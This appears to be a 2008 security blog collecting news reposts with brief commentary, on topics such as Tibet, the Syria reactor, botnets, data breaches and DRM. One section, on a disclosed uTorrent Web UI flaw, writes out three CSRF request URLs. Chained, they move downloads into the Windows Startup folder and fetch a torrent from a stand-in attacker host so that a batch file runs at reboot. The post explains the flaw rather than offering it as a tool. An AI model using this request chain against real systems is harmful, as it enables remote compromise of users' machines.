China’s announcement, made through the country’s official news agency, provided few details about the shape or substance of the talks but said the new discussions would commence “in the coming days.” The breakthrough comes as Chinese officials have pivoted this week and moved to tamp down the domestic nationalist anger unleashed by the Tibetan crisis and by the protests at the international Olympic torch relay.

“In view of the requests repeatedly made by the Dalai side for resuming talks, the relevant department of the central government will have contact and consultation with Dalai’s private representative in the coming days,” said an unidentified Chinese official, according to Xinhua, the official news agency.

The Dalai Lama, the exiled Tibetan spiritual leader, was returning to India from the United States on Friday. He has repeatedly called for renewed talks with Chinese officials and last month sent a letter to China’s president, Hu Jintao. Earlier this month, he hinted in Seattle that a back-channel discussion was already under way. On Friday, his spokesman, Tenzin Taklha, said: “Since His Holiness is committed to dialogue, we would welcome this.”

The spokesman added that the Dalai Lama had not yet received any official communication from China. “We also have to look at when the offer does officially arrive,” he said from Dharamshala, India, the seat of the Tibetan government-in-exile. “We have to look at conditions they are talking about.”

UN Probes US Syria Reactor Claim

Via BBC -

The UN's nuclear watchdog has said it will investigate US claims that Syria was building a secret nuclear reactor with North Korean help.

The International Atomic Energy Agency criticised the US for withholding its intelligence until seven months after Israel bombed the site.

The US said the alleged Syrian reactor "was not for peaceful purposes".

Syria has said the US claim is "ridiculous" and has denied any nuclear links to North Korea.

The site of the alleged reactor, said to be like one in North Korea, was bombed by Israel in 2007.

The director general of the UN's International Atomic Energy Agency (IAEA), Mohamed ElBaradei, has now been briefed by the US on their claims but "deplores" the delay, a statement from the agency said.

"The agency will treat this information with the seriousness it deserves and will investigate the veracity of the information," the statement said.

The agency was critical of both the US delay in releasing the information and of Israel's bombing of the site before the IAEA could inspect it.

"The director general views the unilateral use of force by Israel as undermining the due process of verification that is at the heart of the non-proliferation regime," the statement said.

The statement is a clear indication that Mr ElBaradei is not accepting the US claims at face value and wants his own first-hand information, says BBC diplomatic correspondent Bridget Kendall.

Syrian officials have said the site that was bombed by Israel on 6 September 2007 was an unused military facility under construction. Building on the site had stopped some time before the air strike, the Syrians said.

On Thursday, American security officials showed members of Congress evidence they said proved Syria was building a nuclear reactor with North Korean assistance.

Among the evidence they displayed were pictures - said to have been obtained by Israel - allegedly taken inside the facility showing the reactor core being built.

The images showed striking similarities between the Syrian facility and the North Korean reactor at Yongbyon, the US said.

China Now Has More Internet Users than Any Other Country

Via DailyTech -

Percentage of Chinese population using the Internet is lower than global average

China is one of the most heavily populated countries in the world, but it is also has a large proportion of poor citizens without access to technology. As a result of the huge numbers of Chinese citizens the number of internet users in China is growing rapidly.

The Chinese government commonly censors the Internet and has only recently begun allowing Chinese citizens to have access to English-language websites. According to numbers released from the Chinese Ministry of Information, China now has 221 million internet users. This number is up significantly from the end of 2007 when China reported 210 million internet users.

At the end of 2007 the U.S. had 205 million internet users. The Chinese Xinhua News Agency quoted the Chinese Information Ministry as saying, “Despite rapidly increasing the Internet population, the proportion of Internet users among the total population is still lower than the global average level.”

The global average for percentage of Internet users in a country is 19.1%; China only has an average of 16%. Chinese authorities expect to have 280 million internet users by the end of 2008.

The internet is an outlet for Chinese citizens to voice opinions in a country where traditional new media is strictly controlled. The lack of control over the internet compared to the control China exerts on other forms of media led Chinese President Hu Jintao to call for a purification of the internet in 2007.

-----------------------------

Yeah, I mean, what would happen is normal everyday citizens were allowed to have a voice and express it via the Internet. Chaos, thats what. Clearly.

Zune Software ActiveX Arbitrary File Overwrite Exploit

Vulnerability class : Arbitrary file overwrite
Discovery date : 21 April 2008
Remote : Yes
Credits : J. Bachmann & B. Mariani from ilion Research Labs
Vulnerable : Zune software: EncProfile2 Class

An arbitrary file overwrite as been discovered in an ActiveX control installed with the Zune software package.

If a user visits the malicious page and authorize the control to run (it is not marked safe for scripting), the attacker can erase an arbitrary file.

http://www.milw0rm.com/exploits/5489

Researchers Infiltrate and 'Pollute' Storm Botnet

Via DarkReading -

Sophisticated peer-to-peer (P2P) botnets like Storm that have no centralized command and control architecture have frustrated researchers because they're tough to dismantle. But a group of European researchers has come up with a way to disrupt these stealthy botnets -- by “polluting” them.

The researchers, from the University of Mannheim and the Institut Eurecom, recently infiltrated Storm to test out a method they came up with of analyzing and disrupting P2P botnets. Their technique is a spinoff of traditional botnet tracking, but with a twist: it not only entails capturing bot binaries and infiltrating the P2P network, but it also exploits weaknesses in the botnet’s P2P protocol to inject “polluted” content into the botnet to disrupt communication among the bots, as well as to study them more closely. The researchers tested their pollution method out on Storm -- and it worked. They presented their research this month at Usenix.

-------------------------

This is an awesome idea. But it won't be long until botnets are designed to protect their traffic a bit better - cat & mouse.

Trojan Horses Still Kicking After All These Years

Via Wired.com -

About 3,000 years ago Thursday, some Greeks left the people of Troy a wooden horse at the walled city’s front gate -- a free gift, no cost, no obligation from would-be invaders who wanted their adversaries to think they had left in peace.

Accepting the Trojan horse at face value turned out to be a big mistake.

Some things never change. In the 21st century Trojan horses are made of electronic "1s" and "0s" but are still left for you in all innocence and in plain sight: your e-mail inbox, in IMs and on a web page. But the intent, and the outcome, is pretty much the same: to pillage and steal.

The computer security industry describes computer Trojans as any program that purports to be one thing -- a screensaver or a .pdf file or a video codec -- but which actually conceals a malicious payload, like a password logger or pop-up advertising software.

One might be tempted to think we've gotten smarter in the three millennia since the Trojans ignored Cassandra's warning and accepted the first one. But when it comes to a propensity to fall for a deal that is too good to be true, humans have made little progress.

Or none whatsoever, if you believe computer-security guru Peter Neumann.

"People are still just as stupid now as they were then," says Neumann, the chief scientist at SRI's computer-security lab. "They see something shiny or a website that offers something for free and then they are dead."

But don’t expect technology to save you from yourself any time soon, Neumann warns.

-------------------------

Human: You are the weakest link. Goodbye.

Thieves Use Eee PC in Brazilian ATM scam

Via engadget.com -

Man, that tiny Eee PC can be used for just about anything: surfing the web, blogging, surreptitiously hiding inside an ATM machine and stealing your identity. You know, the usual stuff. Yeah, so three creative Brazilian thieves were recently caught stuffing a black Eee into an ATM, where it replaced the ordinary magical-money-making workings and instead stole unwitting customers' card numbers and PINs. The thieves didn't stop there, however -- they purposefully damaged all the other nearby ATMs so that theirs would be the only one in service. Clever! Of course, that doesn't explain why it was so easy to crack open the target ATM in the first place -- we'd pretty much consider our cash flow problems solved if we could pull that trick.

US Court Says IP Addresses Are Private

Via The Register UK -

A US court has ruled that users have a "reasonable expectation of privacy" in their internet surfing records and that police must obtain warrants from higher than usual courts in order to force ISPs to hand over records.

The Supreme Court of the state of New Jersey said that information about a person's use of the internet was so private that police there cannot order ISPs to release surfing details of suspects with a municipal court subpoena. They must receive a grand jury subpoena, it said.

"The court holds that citizens have a reasonable expectation of privacy in the subscriber information they provide to internet service providers," said the court's ruling. "Law enforcement officials can obtain subscriber information by serving a grand jury subpoena on an Internet service provider without notice to the subscriber."

Chief Justice Rabner said: "Individuals need an ISP address in order to access the internet. However, when users surf the web from the privacy of their homes, they have reason to expect that their actions are confidential. Many are unaware that a numerical IP address can be captured by the websites they visit. More sophisticated users understand that that unique string of numbers, standing alone, reveals little if anything to the outside world. Only an internet service provider can translate an IP address into a user’s name."

The case involved Shirley Reid, who was accused of hacking into her employer's computer system.

After Reid's ISP, Comcast, handed over details of her account, including the IP address from which she accessed the internet, she was found guilty of computer theft in connection with the hacking incident.

Reid overturned that decision on appeal and at the Supreme Court of New Jersey stage, arguing that the evidence should be suppressed.

Reid's lawyers had argued that a person should be informed when a subpoena is issued permitting the release of their telecommunications subscription details so that they can oppose the move. The Supreme Court of New Jersey, though, said that as long as the subpoena is from a grand jury the information can be released without the knowledge or consent of the user.

"Modern technology has raised a number of questions that are intertwined in this case: to what extent can private individuals 'surf' the 'web' anonymously? Do internet subscribers have a reasonable expectation of privacy in their identity while accessing internet websites? And under what circumstances may the State learn the actual identity of internet users?" said Chief Justice Rabner in his ruling.

"We decline to adopt a requirement that notice be provided to account holders whose information is subpoenaed," he said. "For obvious reasons, notice could impede and possibly defeat the grand jury’s investigation. Particularly in the case of computers, unscrupulous individuals aware of a subpoena could delete or damage files on their home computer and thereby effectively shield them from a legitimate investigation."

The court said that although Reid was successful in having the municipal warrant-obtained evidence suppressed, the police were not barred from approaching Comcast again and obtaining the records using an appropriate warrant.

Experts Warn of 'Tornado' Hacker Tool

Via vnunet.com -

Security researchers have discovered a new web-based attack tool which exploits up to 14 browser vulnerabilities and installs malware on the user's system.

Symantec researcher Liam O'Murchu said that 'Tornado' is commonly installed on a server by a single 'administrator', who then offers accounts on the server to other attackers.

The attackers then inject code into other web pages to redirect users to the Tornado server, where the exploit and malware installation is conducted.

"Perhaps this is why the code for this pack has stayed private for so long," said O'Murchu.

"Using this model, the creators of the pack can sell it to a few trusted customers at a higher price, rather than selling it to many untrustworthy customers and risking the code being released in the underground."

Tornado also offers attackers a full set of traffic statistics and options for selecting which exploits can be conducted.

The malware features an option to redirect repeat visitors to a phoney 'account suspended' page.

This helps the tool to evade security researchers who will make repeated visits to infected pages in order to study the exploits and malware in use.

Programs such as Neosploit and MPack offer similar capabilities to set up servers that can conduct multiple exploits against users.

IAEA Says Iran Agrees to Clarify Nuclear Activity

Via VOA News -

The International Atomic Energy Agency says Iran has agreed to cooperate in clarifying whether it has tried to develop nuclear weapons. From Paris, Lisa Bryant reports the Vienna-based IAEA hopes Tehran will provide the information in May.

News of Tehran's agreement to cooperate in clarifying whether or not it has been involved in nuclear-weapons development was provided in a brief statement by the IAEA. The IAEA considers the agreement a positive sign. It comes a day after Iran's government described talks with top IAEA investigator Oli Heinonen in Tehran as positive.

The United States and other western powers believe Iran is trying to build a nuclear weapon, but Tehran says its nuclear activities are for purely peaceful purposes - to generate energy.

---------------------

Talk about déjà vu....

US Scraps $20 Million Prototype of Virtual Fence

Via AP -

The government is scrapping a $20 million prototype of its highly touted "virtual fence" on the Arizona-Mexico border because the system is failing to adequately alert border patrol agents to illegal crossings, officials said.

The move comes just two months after Homeland Security Secretary Michael Chertoff announced his approval of the fence built by The Boeing Co. The fence consists of nine electronic surveillance towers along a 28-mile section of border southwest of Tucson.

Boeing is to replace the so-called Project 28 prototype with a series of towers equipped with communications systems, new cameras and new radar capability, officials said.

Less than a week after Chertoff accepted Project 28 on Feb. 22, the Government Accountability Office told Congress it "did not fully meet user needs and the project's design will not be used as the basis for future" developments.

A glaring shortcoming of the project was the time lag between the electronic detection of movement along the border and the transmission of a camera image to agents patrolling the area, the GAO reported.

Although the fence continues to operate, it hasn't come close to meeting the Border Patrol's goals, said Kelly Good, deputy director of the Secure Border Initiative program office in Washington.

"Probably not to the level that Border Patrol agents on the ground thought that they were going to get. So it didn't meet their expectations."

The Border Patrol had little input in designing the prototype but will have more say in the final version, officials said.

Microsoft to Remove Users Rights From Defunct MSN Music Service

Via CNET News -

Microsoft handed plenty of ammunition to the anti-DRM crowd on Tuesday by announcing it will no longer furnish authorization keys for songs purchased from the defunct MSN Music service.

For former customers of MSN Music--the service Microsoft operated before closing it in late 2006 and opening Zune Marketplace--August 31 will be the last day that they can move music to different computers. After that, Microsoft will no longer "support the retrieval of license keys for the songs you purchased on MSN Music or the authorization of additional computers," the company said in an e-mail to former MSN Music customers.

It's important to note that the music won't disappear after the deadline. Songs will continue to play on authorized computers. What the announcement means is that former MSN Music customers will risk losing their music libraries if they try to transfer songs to unauthorized computers or swap operating systems after Aug. 31.

There are a couple of ways to safeguard the music but they aren't pretty. Before the deadline, those affected can move songs to computers they plan to own for a while (the songs can be authorized to play on five different PCs). Another alternative is to burn songs to CDs and rerip. This means the loss of sound quality but offers more peace of mind.

Bloggers pounced on the news, writing that the situation illustrated just how anti-consumer that digital rights management is. The point most of them made: whatever hardware the songs are stored on will malfunction eventually, and the owner's music (in a high quality form at least) will be gone forever.

"Ultimately, this serves as a reminder of what DRM really is," wrote Justin Mann at TechSpot.com. It's a "way for companies to control your use of their content. Rather than purchasing, you are renting."

-------------------

Lame...

Companies work very hard to hide customer-based DRM's true face, but once in a while...it comes shining through....in all its ugliness.

Google Searches that make you go hmm...

I'm going to take a stab and say that iPods are not allowed in classified areas according to Air Force Policy...but I could be wrong.

25th Anniversary of WarGames

Happy 25th Year!

WarGames on AMC, right now...and all this week.

Good ole TAB cola! lol

Microsoft Security Intelligence Report (SIR) - Volume 4

Via DarkReading.com -

Here’s another reason to hold onto your laptops: 57 percent of publicly disclosed security breaches came from lost or stolen equipment in the second half of last year, compared with only 13 percent from hacking and malware, according to Microsoft’s latest Security Intelligence Report, which was released today.

The new Microsoft report, which focuses on vulnerability and exploit data it gathered from July through December of 2007, found that exploits, malware, and hacks made up only 23 percent of security breach notifications between 2000 and 2007.

And the software giant recorded a whopping 300 percent jump in Trojan downloaders and droppers detected in the second half of ’07, as well as a curious 15 percent drop in the disclosure of new vulnerabilities. Overall, vulnerability disclosures decreased by 5 percent for all of 2007.

It was the decrease in vulnerability disclosures that most caught Microsoft by surprise, says Jimmy Kuo, principal architect of the Microsoft Malware Protection Center. “This is the first time since 2003 that there’s been such a decrease,” Kuo says.

The finding also surprised other security experts, including Doug Camplejohn, CEO of Mi5 Networks. But Camplejohn warns that one data point doesn’t make a trend. “It remains to be seen whether there's a true downward trend here, or whether vulnerability discoverers are just being more tight-lipped about vulnerabilities,” Camplejohn says.

All Your WoW Gold Belong to Us!

Via prevx.com -

In the last day or so we have had a massive influx of users coming to us because they are infected with a file called Chenzi.exe. After analyzing a sample in the lab here, all I can say is, this is pretty insane!

We started off with a clean machine with 56 running processes, after 10 minutes of running, we had ... 318 running processes. I tried to make a video of it, but the machine just couldn’t handle it. This file is a downloader for many things at once, one being a password stealer for various online games. We've added detections for the entire cluster of files downloaded from all the downloader’s we could get, so it would be worth a go trying to clean this up with Prevx CSI. I’d love to hear some feedback from anyone that’s had this infection. Some signs of this infection is constant popups asking you to install Chinese language packs, various Chinese websites popups, and your entire right click menu changing from English to Chinese.

The main goal of this Trojan however is based around stealing WoW accounts, let us know if you have any more info, or have been affected by this threat as it seems rather prevalent at the moment.

In the meantime I'll try and get some video footage up of this infection.

Microsoft Gives Storm a Lashing

Via Computerworld -

Microsoft Corp. today took credit for crushing the Storm botnet, saying that the malware search-and-destroy tool it distributes to Windows users disinfected so many bots that the hackers threw in the towel.

"They realized they were in our gun sights," said Jimmy Kuo, a principal architect with Microsoft's malware protection center, the group responsible for the Malicious Software Removal Tool (MSRT). Microsoft updates and automatically redistributes the software tool to Windows users each month on Patch Tuesday.

Last year, said Kuo, the criminals behind the Storm Trojan -- malware designed to compromise PCs and add them to a botnet, or collection of infected machines -- tried to keep pace with Microsoft and the MSRT. "They were anticipating our monthly release [of MSRT]," said Kuo, "with new versions that were ready to go immediately before our release."

The bunch controlling the Storm botnet knew that it took Kuo's group several days to create new definitions for the MSRT, and that Microsoft held to a once-a-month release schedule for the tool. And they used that lag time and set schedule to their advantage.

"They knew that it takes [us] a week or more to create new definitions, and they were prepared to update their botnet immediately prior to MSRT releasing," he said, adding that the hackers would get a new version of the Trojan onto already-infected members of the Storm botnet to try to hold on to the machines after Windows had downloaded the newest version of the MSRT.

The idea was to preempt detection by swapping out the Storm bot already on the PC with a version less likely to be identified by the MSRT.

It didn't work, said Kuo. "They found out that even that was a losing battle," he said. "Even though they were able to maintain parts of their botnet, they knew they were in our gun sights. And ultimately they gave up."

According to Kuo, it was the hammering Microsoft gave the Storm botnet that sent the hackers packing.

In the last four months of 2007, the MSRT disinfected more than 526,000 PCs plagued by the Storm bot, he claimed. The bulk of those -- more than 291,000 -- were cleaned in September, when Microsoft first added Storm detection to the MSRT. In October, the number dipped to around 90,000, then bounced back to about 100,000 each month in November and December.

The front-loaded numbers, said Kuo, were typical, since the first month that the MSRT has a new malware definition, the tool cleanses all machines that have ever been infected. In the following months, it can only disinfect PCs that have been infected since the last release of the tool.

Storm, which first appeared in early 2007 -- and got the moniker because it was first disseminated in spam messages that claimed to have news of a massive series of winter storms that swept Europe -- has been linked to the Russian Business Network (RBN), a shadowy network of malware and hacker hosting services once based in St. Petersburg.

Others have confirmed Storm's decline, and credited Microsoft.

Earlier this month, Joe Stewart, the director of malware research at SecureWorks Inc., unveiled research on the world's top 11 botnets, and using SMTP "fingerprinting" and traffic extrapolations, estimated the size of each of those spam-sending botnets. Storm, said Stewart, was No. 5 on that list of 11 and likely controlled about 85,000 PCs -- a far cry from its height in 2007 and about one-fourth as many as the leading botnet, Srizbi.

"Storm is pretty insignificant at this point," Stewart said in an interview two weeks ago. "It got all this attention, so Microsoft added it to its malicious software detection tool [in September 2007], and that's removed hundreds of thousands of compromised PCs from the botnet."

But while Kuo was happy to take the credit on behalf of Microsoft for shrinking Storm, he was realistic about the overall impact.

"What we did was to drive them [the Storm bot herders] elsewhere," he said. "They're probably out there still making money with some other botnet."

Mac Hack Contest Bug Had Been Public for a Year

Via PC World -

When Charlie Miller won US$10,000 for hacking into a Macbook Air laptop last month, he exploited a flaw that had been publicly disclosed nearly a year before the contest.

The flaw, it turns out, lay in an open-source software library called the Perl Compatible Regular Expressions (PCRE) library, which is used by many products including Apache, the PHP scripting language, and Apple's Safari browser, which Miller hacked to win the contest.

Miller won $10,000 and a new Macbook Air last month after hacking into the laptop in a matter of minutes. The PWN2OWN contest invited hackers to try to install unauthorized software on fully patched Mac OS X, Windows and Linux computers using previously undisclosed "zero-day" flaws.

In an e-mail interview, security researcher Chris Evans said he found the bug, which he publicly disclosed in November 2007. PCRE developers fixed the bug months earlier while writing an incomplete fix for the issue in the May 2007 PCRE 6.7 product, Evans said.

Although Apple's Safari browser uses the PCRE software library, the company did not patch its version of the library until late last week. That means that an astute hacker who had noticed the fix in PCRE 6.7 would have been given an early tip on how to hack into Apple's computers.

Discovering a software bug is the first step toward figuring out how to use that flaw in an attack, but not every flaw leads to a successful exploit.

In an e-mail interview, Miller confirmed that the bug he'd exploited was the same one that was patched in PCRE 6.7, but said that researchers at his company, Independent Security Evaluators, had found it "completely independently."

Miller found another PCRE bug that allowed him to be the first hacker to break into the iPhone after it was launched last year.

It is very common for developers to incorporate someone else's software library into their program and then not properly add all the latest bug fixes, said Dragos Rui, one of the organizers of the PWN2OWN contest.

However, Apple should have done a better job of staying on top of the software it was shipping. "This is a black mark on their security team, but it's a common problem," he said. The same kind of issue has popped up frequently with products that use the zlib and JPEG compression libraries, he added.

An Apple representative could not immediately comment for this story, saying that he would have to first research the issue.

Ironically, Miller gave a presentation at the Black Hat security conference last year, arguing that one way to find bugs in Mac OS X would be to look for out-of-date open-source software that ships with the Mac and then to scan that project's files.

I told Apple about this backporting problem then and they didn't listen and I didn't listen either, because we didn't find the bug by looking at changelogs, we found it with source code analysis," Miller said.

Although the focus of the PWN2OWN contest was on zero-day flaws, the fact that Miller exploited a flaw that was unpatched in Apple's products was enough to earn him the prize, conference organizers say.

That's a good thing, because when asked if he planned to return the prize money, Miller shot back the following: "No way. It's not my fault they don't fix their bugs."

----------------------------

This speaks for itself....but clearly, Apple failed to backport a open-source fix into their product. A year later, it is used for pure drive-by download pwnage in its browser.

I have been saying this for some time and so have many many other security professionals. It is only a manner of time before this exact issue takes a bigger bite of Apple - unless they really crack down and get serious about working open source patches back into their products in a timely fashion.

LendingTree Discloses Insider Data Breach

Via NetworkWorld -

Web-based lending exchange LendingTree, which generates leads in the mortgage business by accepting online customer information, yesterday disclosed that it believes several former employees illicitly helped a handful of mortgage lenders gain access to customer data.

"Recently, LendingTree learned that several former employees may have helped a handful of mortgage lenders gain access to LendingTree's customer information by sharing confidential passwords with the lenders," LendingTree stated in a letter sent April 21 to its customers. "When we learned of this situation, we quickly contacted the authorities, and LendingTree is helping with the investigation. We promptly made several system-security changes. We also brought lawsuits against those involved."

LendingTree spokeswoman Allison Vail acknowledged the letter had been sent to customers, but declined to provide further details, such as how many customers would be affected.

LendingTree believes the lenders gained illicit entry to its data systems to access LendingTree’s loan-request forms between October 2006 and early 2008. The Charlotte, N.C.-based firm stated that the loan-request forms contained such customer data as name, address, e-mail address, telephone number, Social Security Number, income and employment information.

LendingTree said it is not aware of identity theft or fraudulent activity resulting from the breach.

Army Engineer Charged For Passing Secrets to Israel

Via AP -

A former U.S. Army mechanical engineer was arrested Tuesday on charges he slipped classified documents about nuclear weapons to an employee of the Israeli Consulate who also received information from convicted Pentagon spy Jonathan Pollard, authorities announced.

Ben-ami Kadish faces four counts of conspiracy, including allegations that he conspired to disclose U.S. national defense documents to Israel and that he acted as an agent of the Israeli government, U.S. Attorney Michael J. Garcia and FBI officials said.

A criminal complaint said the activities occurred from 1979 through 1985 while Kadish worked at the Army's Armament Research, Development and Engineering Center in Dover, N.J.

Kadish, a U.S. citizen, is accused of taking classified documents home several times and letting the Israeli government worker photograph them.

The documents included information about nuclear weapons, a modified version of an F-15 fighter jet, and the Patriot missile air defense system, the complaint said.

According to the complaint, the Israeli government worker on numerous occasions during 1979-1985 gave Kadish lists of U.S. national defense classified documents for Kadish to obtain.

The complaint said Kadish, born in Connecticut, was employed from October 1963 to January 1990 as a mechanical engineer at the Army's Picatinny Arsenal in Dover, where the research center is based.

The complaint said the Israeli worker, whose name was not given, is an Israeli citizen. It said that in the late 1970s, he was employed at Israeli Aircraft Industries in Israel, a defense manufacturing contractor for the Israeli government.

From July 1980 through November 1985, he was the consul for science affairs at the Israeli Consulate General in Manhattan, the complaint said.

There was no immediate response to calls seeking consulate comment Tuesday.

Al Qaeda Officially Hates The Counterterrorism Blog

Via CT Blog -

When I started this website in January 2005, I never envisioned that that Al Qaeda would target us for a hit piece over the Internet. Well, voila, the blessed day has arrived. The wonderful folks at the SITE Intelligence Group found the item below on Al-Ekhlaas, one of Al-Qaida's central messaging forums on the Internet, which has begun a new series in English titled, "Watching and Monitoring the Jihad Media Watchers." They passed along the item below to Evan Kohlmann, who sent it to me, and I want to share it with our readers and contributors. They also passed out a "Badge of Honor" to SITE, Evan Kohlmann, IntelCenter, the NEFA Foundation, and Internet Haganah (my congrats to them).

-------------------

Check out the CT link above for the full details.

Kudos to every site named in this blog. I can say that I have been a reader of each of these sites for many years. They are all well maintained and very informative.

Wherever there are watchers...there will be watchers of those watchers. But who is watching the watchers of the watchers? That is the question. lol

British Police Use Facebook to Gather Evidence

Via CSOOnline -

The Greater Manchester Police force is looking for friends -- on Facebook.

It has created a Facebook application to collect leads for investigations, marking the first use of the social networking site by U.K. law enforcement.

The application delivers a real-time feed of police news and appeals for information. Next to that content is a feature to share a particular story with other friends in a person's network, as well as post comments.

One of the recent updates is an appeal asking for information about four men, one of whom was armed with an axe, who robbed a betting shop.

A "Submit Intelligence" link takes a Facebook user to the police Web site where they can anonymously submit tips. Another link leads to the videos on YouTube featuring information on the police force, ongoing investigations and other advisories.

One video contains closed-circuit TV footage of two men in hooded sweatshirts seen near the place where a 15-year-old, Jessie James, was shot and killed in Manchester in November 2006.

So far about 750 people have put the application on their profile, the police said. They estimate about seven million of the 59 million worldwide Facebook users live in the U.K.

The application has received a universally positive response. "Good thinking GMP [Greater Manchester Police]!" wrote Facebook user Sammie Jane. "This is a sure-fire way to branch out to the younger generation and also to encourage anonymous information."

New Tool Lets Enterprises Manage Security on Multiple Linux Servers

Via DarkReading -

The good news about open source security tools is that they're cheap and don't require much administration. The bad news about open source security tools is that they're cheap and don't require much administration.

That's the problem faced by many computing environments that use a large number of Linux servers. The security tools available in the open source environment are easy to procure, but they don't offer a central method of handling administration across multiple servers.

Trusted Computer Solutions Inc. tomorrow will attempt to jump into this void with the introduction of Security Blanket 2.0 Enterprise Edition, an automated "system lock down" and security management tool for Linux operating systems that can manage all local and remote Linux servers from a centralized Web-based management console.

The idea is to make it easier for larger Linux environments, such as government and educational organizations, to do the "hardening" process required to meet security compliance requirements, says Jamie Adams, senior developer at TCS.

"This will help organizations lock everything down to make assessors happy," Adams says. "It helps you figure out what needs to be configured, and then it helps you do the configuration. Then it helps you enforce the policy, making sure all of your servers are configured consistently and all the patches are up to date."

Currently, the primary open source tool for security administration is Bastille, but Bastille can't configure multiple servers from a central location and doesn't always meet current standards for compliance. "There's no commercial entity working on it," Adams observes. "You're not always getting updates right away."

The Enterprise version enables administrators to easily group Linux servers, associate a lockdown profile with a group of servers, scan all servers within a group to determine compliance, and configure the server operating systems to the lockdown level of the chosen profile.

Security Blanket 2.0 Enterprise includes the security guidelines recommended by the Center for Internet Security (CIS), the Defense Information Security Agency (DISA) Security Technical Implementation Guides (STIGs), and select guidelines from the SANS Institute’s defined risks associated with Linux. It lets administrators group servers, select one of these industry lockdown profiles (or build their own), assess the state of the servers against the profile, and then automatically configure the operating systems to meet those profile guidelines, TCS says.

Automation might increase organizations' interest in server hardening, which many still don't do, said Forrester Research in a report issued last year.

"Although server hardening is a well-established practice, only [45 percent] of interviewees harden all of their servers, and [26 percent] left some Internet-facing servers unhardened," Forrester said. "Why? Perhaps because they feel they can't spare the time -- today, [53 percent] of systems administrators harden their servers manually."

Security Blanket Enterprise Edition starts at $3,000 for a console that supports up to 100 servers. Server licenses start at $198 per server.

uTorrent CSRF Pwnage

Via xs-sniper.com -

A few weeks ago, Rob Carter told me about a few interesting CSRF vulnerabilities that he discovered in a uTorrent plugin (he publicly disclosed them this weekend). Rob was able to chain together the CSRF vulnerabilities and the net result is complete compromise of the victim’s machine! I think this may be the first PURE CSRF vulnerability that I’ve seen that resulted in compromise of a victims machine (there is an argument amongst some of my colleagues as to whether protocol handling/URI vulnerabilities are actually a form of CSRF, but that’s another story). The series of vulnerabilities basically follow this flow:

When a user installs the uTorrent Web UI plugin. the plugin essentially starts a locally running web server on your machine (in order to serve the Web UI). Rob targets the CSRF vulnerabilities associated with this locally running web server.

• Rob uses a first CSRF to turn on the “Move completed downloads” option on the uTorrent Web UI. The CSRF looks something like this:
  http://localhost:14774/gui/?action=setsetting&s=dir_completed_download_flag&v=1

• Once Rob has “turned on” the “Move completed downloads” functionality, he uses a second CSRF to change the path of where the completed torrent download is placed. In the example he gives, he forces the uTorrent plugin to move completed torrent downloads to the Windows startup folder. This CSRF looks something like this:
  http://localhost:14774/gui/?action=setsetting&s=dir_completed_download&v=C:\Documents%20and%20Settings\All%20Users\Start%20Menu\Programs\Startup

• The last step in Rob’s example forces the victim to download a torrent which points to an attacker controlled bat file. Once the file is downloaded, uTorrent places the files into the victim’s startup folder (thanks to the first two CSRFs). This CSRF looks something like this:
  http://localhost:14774/gui/?action=add-url&s=http://www.attacker.com/file.torrent

Once the file is placed, the next time the user restarts their machine, the attacker controlled file will be run… there you have it… compromise of a victim’s system through three CSRFs! Scary stuff… you can read more about the issue on Robs Blog

Google Searches that make you go hmm...

Legal notice to Jswiff? How is Oracle involved?...ummm




Either this is someone trying to find out how to defraud Coinstar machines, or something conducting serious "research".



Looks like a group of "419" scammers is preparing a new e-mail focused around Glass Manufacturers.

Bringing Sexy Back to Indian Cricket

"Sexuality and cricket is the way forward. And it's time India wakes up to the fact that it's a different society. It's a modern society. There's no use keeping it all under wraps."

http://www.washingtonpost.com/wp-dyn/content/article/2008/04/18/AR2008041803577.html

------------------

Thanks to my friend, Kelli C., for the link.

A Good Student's 'Unexpected' Bomb Plot

Via ABC News -

A South Carolina teenager arrested for plotting to bomb his school had designs for an arsenal of explosives including a nail bomb that would have "devastated" students in a crowded hallway, a local police chief said today.

Ryan Schallenberger, 18, called his plot "Columbine III" and laid out details in a "bomb summary" that described the different types of explosives he would use in the suicide attack. He even recorded his expenses.

"I think he was more concerned about a high body count than killing anyone in particular," Chesterfield Police Chief Randall Lear told ABC News.

Schallenberger's "summary" contained details for a nail bomb.

"Inside a school, with confined concrete walls, just a little bit of nails, nuts and bolts, ball bearings and some of these explosives devices, it would devastate the student body," Lear said.

Authorities arrested Schallenberger on Saturday after a package arrived at his family's rural South Carolina home and his parents opened it to find 10 pounds of ammonium nitrate, a substance that can be used as an explosive when combined with diesel fuel or another accelerant.

The teen's parents called the police, and officers recovered the explosives material and found details of the high school senior's plot. Schallenberger, who was not at home at the time, was picked up along a dirt road near his house.

No guns or other weapons were found in the house.

"I can honestly tell you, were I faced with that scenario, I don't know if I could have made that decision," Lear said. "I don't know whether I would have been brave enough to do what these parents did."

Schallenberger, who had recently won a partial scholarship to college, said nothing and appeared agitated during a brief court appearance today, in which he was assigned a lawyer. The county prosecutor said he will ask that Schallenberger undergo a mental health evaluation.

The bomb summary found in the suspect's bedroom laid out a map of the school, the different types of explosives that would be used in the attack and specific materials needed for each.

While there was no date provided for the bombing, Lear said that with the shipment of ammonium nitrate, he had all the materials he would need to carry out the attack at his fingertips.

"This was a legitimate threat," Lear said. "Once that package was in, he had what he needed to formulate these explosives devices."

700K Hoosier ID's Compromised in Computer Theft

Via Pal-item.com -

NDIANAPOLIS -- A computer server containing Social Security numbers and other personal information of 700,000 people was stolen last month from a Southside debt-collection bureau in what appears to be the largest computer security breach ever in Indiana.

The information includes customer-billing records for about 100 Indiana businesses, including Citizens Gas & Coke Utility, St. Vincent Health and Methodist Medical Group.

The exposed data was limited to past-due billing information that had been turned over for debt collection to the Central Collection Bureau, the agency announced Friday. Customers whose accounts were in good standing were not affected.

The bureau collected overdue bills on behalf of dozens of Indiana companies, including hospitals, medical and dental offices, window companies, water-conditioning companies and flower shops.

"We're obviously heartsick about this," said Chet Klene, the collection agency's president. "We've been in business since 1972, and nothing like this has ever happened before."

He said the missing computer server contained personal billing information that was protected by two passwords but was not encrypted. He said the server had been stored behind three locked doors.

Klene said the break-in occurred on Good Friday, March 20. The first employee arriving at work that day noticed the break-in and immediately called the Indianapolis Metropolitan Police Department, which investigated but has not found the server. The collection agency has notified companies whose billing records have been compromised, Klene said.

Joan Antokol, a lawyer specializing in computer security at Baker & Daniels, an Indianapolis-based law firm, said the breach was the largest she had seen in Indiana. No larger breaches in Indiana are included among the hundreds of incidents listed on Privacy Rights.org, a national clearinghouse.

"It's a problem that continues to grow," Antokol said. "There are new cases reported all the time. It's a serious problem."

